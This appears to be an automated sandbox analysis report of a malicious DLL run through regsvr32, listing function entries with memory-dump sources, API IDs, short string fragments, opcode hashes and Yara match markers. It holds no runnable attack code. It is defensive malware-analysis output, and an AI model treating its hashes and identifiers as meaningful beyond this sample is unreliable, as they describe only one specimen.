                                                                                                                                                                                                                    • Instruction ID: c21e143e87a7e0188234578f887ac6dddb0b4d41a220ed456f7706020fedd252
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1641D5B081078E8FDF44CF64D88A4CE7BF0FB58358F114619E869A6260D3B89664CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E00000001180001D98(long long __rbx, long long _a32) {
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_a32 = __rbx;
                                                                                                                                                                                                                    			}



                                                                                                                                                                                                                    0x180001d98

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                    • Opcode ID: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                                                                                                                                    • Instruction ID: 8b5b8807919832646eb0d744692d73e0514a3f66bd27872d13ad1b0d2e18aa1e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6113C32600F449AEB52CF61EC943D833A4F31D799F041A25FAAD477A4DF78C2A88340
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #X$ $UCV$y4.)
                                                                                                                                                                                                                    • API String ID: 0-917551206
                                                                                                                                                                                                                    • Opcode ID: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                                                                                                                                    • Instruction ID: 3027389628982741ed0ae54b0f88c24eb04dba0b3398705478749fc3d1d178a2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD12E4B1A0470C9FDB58DFA8E08A5DDBBF2FB48348F00412DE946A7290D7B5D819CB95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #X$rq%$tL>$".
                                                                                                                                                                                                                    • API String ID: 0-3922733902
                                                                                                                                                                                                                    • Opcode ID: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                                                                                                                                                    • Instruction ID: 7775b75e5cbb9fa5e511f2ace284c585ac6414b2cae58ffd2ad76bf55f800154
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2922D0709096C88BDBF8DF24C8896DD37F1FF48344F90125AD84E9AA54DBB86685CF42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: g$-$HE$Vc
                                                                                                                                                                                                                    • API String ID: 0-2562162751
                                                                                                                                                                                                                    • Opcode ID: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                                                                                                                                                    • Instruction ID: 41b229059f3d0b9e15a5078438387e76611a20d702efb82d92d9181d3cb18772
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81A1D1B150478C9FDB84DF28D88A4CD3BB2FB58358F505219F84A87260D7B8D985CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: (;$*i$he$*%
                                                                                                                                                                                                                    • API String ID: 0-35414758
                                                                                                                                                                                                                    • Opcode ID: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                                                                                                                                                    • Instruction ID: 7b0846457655220889516dd6f64cbbb0ba9bfc076f3042b598e1dfd4df5d00c1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC7125705143499FDF48CF28C88A5DD3BA6FB48368F565319FC4AA7290CB78D885CB89
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: */$I$Yu$(
                                                                                                                                                                                                                    • API String ID: 0-674225443
                                                                                                                                                                                                                    • Opcode ID: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                                                                                                                                                    • Instruction ID: a063843d702c335c142b09a9206df31bfacffff1b2e558c469597a991a1d4e6b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C718DB190070ACFDB58CF68D48A5DE7FB0FB68398F204219F85596260D7B49AA5CFC4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #X$.:$PYq|$W
                                                                                                                                                                                                                    • API String ID: 0-626586655
                                                                                                                                                                                                                    • Opcode ID: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                                                                                                                                                    • Instruction ID: 60f85f0b1596b4a4cb4f42e98d0aad99478a22069be7e4d44a7809616e1db196
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D41E27061CB858FD7A8DF28D58A65BBBF1FBD9704F804A1EF58AC7250DB7498048B42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 5`$<ml$a:$P
                                                                                                                                                                                                                    • API String ID: 0-330785107
                                                                                                                                                                                                                    • Opcode ID: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                                                                                                                                                    • Instruction ID: ec6a781192f97a60f73cbd2132ec123f98f4e31b112433b95e879ba944ce6311
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E641F4B190074E8BDB48DF68C48A49E7FB1FB58348F10861DE8569A390E7B89664CFC5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: -+$0u$S$e!
                                                                                                                                                                                                                    • API String ID: 0-4217091389
                                                                                                                                                                                                                    • Opcode ID: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                                                                                                                                                    • Instruction ID: a68298650c36516eee3a3b314558a2eb87c926ab93f8979e79ac69716413ea27
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC41F3B090034A8FDB48CF64C89A5DE7FF0FB68388F20461DF81AA6250D37496A4CBD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: o$"B$SJ$wU
                                                                                                                                                                                                                    • API String ID: 0-691100934
                                                                                                                                                                                                                    • Opcode ID: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                                                                                                                                                    • Instruction ID: 4c952b22460792da16f174e8c7349dd74627acbf9c5f903780e1ab54c6b3f90c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6541DFB180078E8FDB48CF68C88A5DEBBF0FB58358F104619E859A6254D3B89695CFC5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 9luJ$=2y}$=2y}$b
                                                                                                                                                                                                                    • API String ID: 0-1667874806
                                                                                                                                                                                                                    • Opcode ID: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                                                                                                                                                    • Instruction ID: c7305d70f20ab748b87780fa17442986ea7559553b3cf96af4706438d3775682
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3741D7B181038EDFDF44CF64D88A4CE7BB0FB18358F110A19F865A6264D3B89665CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ;$O,$fdu
                                                                                                                                                                                                                    • API String ID: 0-1721916326
                                                                                                                                                                                                                    • Opcode ID: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                                                                                                                                                    • Instruction ID: 617d3b520b777229a693b073f4c0fb65a272721312629640d58a3c9443e44fd4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85A12370D14718EBDF58DFA8E8C999EBBB1FB54304F00421EE806A76A0CB749946CF41
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: u$&v$f
                                                                                                                                                                                                                    • API String ID: 0-1868853588
                                                                                                                                                                                                                    • Opcode ID: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                                                                                                                                                    • Instruction ID: 9f82e5dc2aae3c46deb9caf86b8525a0d925d757ae272f5356452976ed41f39a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15712371D04708ABCF5CDFA8E59959DBBB6FB44314F20412EE416A73A0CB749945CF81
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: o$j$t
                                                                                                                                                                                                                    • API String ID: 0-2067604139
                                                                                                                                                                                                                    • Opcode ID: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
                                                                                                                                                                                                                    • Instruction ID: 5fe3b2ebd37eae5fe1342b8e628234f8fcbc20fcecc96f913a6c8a42d249db0f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1661DEB05087848BD768DF28C18A55BBBF1FBC6704F104A1DE68A8B2A0D77AD844CF43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: P$KGRa$wy
                                                                                                                                                                                                                    • API String ID: 0-4077564265
                                                                                                                                                                                                                    • Opcode ID: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
                                                                                                                                                                                                                    • Instruction ID: eb44b6cac961fbd207ce310956228c115d20559a374274ea1761320259cd0183
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA41C0B090074A8BDF48CF68C8965DE7FB0FB68348F51461DE84AA6290D37896A4CFC4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: =$N@`Y$`Y
                                                                                                                                                                                                                    • API String ID: 0-2183226064
                                                                                                                                                                                                                    • Opcode ID: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
                                                                                                                                                                                                                    • Instruction ID: 01881ec5341fc4eec440ca4020eb5d7a1dea56188f19a7128d555155f5b5ece5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3051D3B190074E8FDB44CF68C88A4DE7FB0FB68398F204619F856A6250D3B496A5CFD4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: '0$~?$\
                                                                                                                                                                                                                    • API String ID: 0-629757258
                                                                                                                                                                                                                    • Opcode ID: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
                                                                                                                                                                                                                    • Instruction ID: f7646cf8f0d64a5e750feff3a0ac1da47c47511c10a1cbb9bd232f5492bf2a22
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3141CEB0548B808BE758CF28C59A51ABBF1FBC5344F604A2DF6968A3A0D774D885CF42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: A7$z$~*b
                                                                                                                                                                                                                    • API String ID: 0-275545515
                                                                                                                                                                                                                    • Opcode ID: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
                                                                                                                                                                                                                    • Instruction ID: 98340cc27d310aa4f16f5d994f466c5a2800d5334974208502213b39fe33e71e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE41E3B080074E8FDB48CF64C48A5DE7FB0FB68398F204619E855A6250D3B896A9CFD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: H$rTk=${,%
                                                                                                                                                                                                                    • API String ID: 0-3174111592
                                                                                                                                                                                                                    • Opcode ID: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
                                                                                                                                                                                                                    • Instruction ID: 61e50fe8ff1c69a744edb06203449d0706181dc22e5aafca74b2903cce3fb18a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A310770528785ABD798DF28C4C991EBBF1FBC4354F906A1CF882862A0C779C845CB43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 15204871-0
                                                                                                                                                                                                                    • Opcode ID: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
                                                                                                                                                                                                                    • Instruction ID: df89035e7e7b250386178c13d978bdab97caeca02fa44d79d4a04f1db2bf885c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCB12C77610B888BEB56CF29C8463987BA0F348B88F15C915EB59877A8CF39C955CB01
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LinkObjectOpenSymbolic
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3706036087-0
                                                                                                                                                                                                                    • Opcode ID: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
                                                                                                                                                                                                                    • Instruction ID: f4502f775a5e45d64f420efd52fcf5a6929529857e1dcb94e78d5b08d8e8d060
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23E0C230B1896842F7EA96BAAC017AB1051A34D7C0F70D429BA02C80C0DCA9C3894704
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: D?"$8zfK
                                                                                                                                                                                                                    • API String ID: 0-617590365
                                                                                                                                                                                                                    • Opcode ID: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
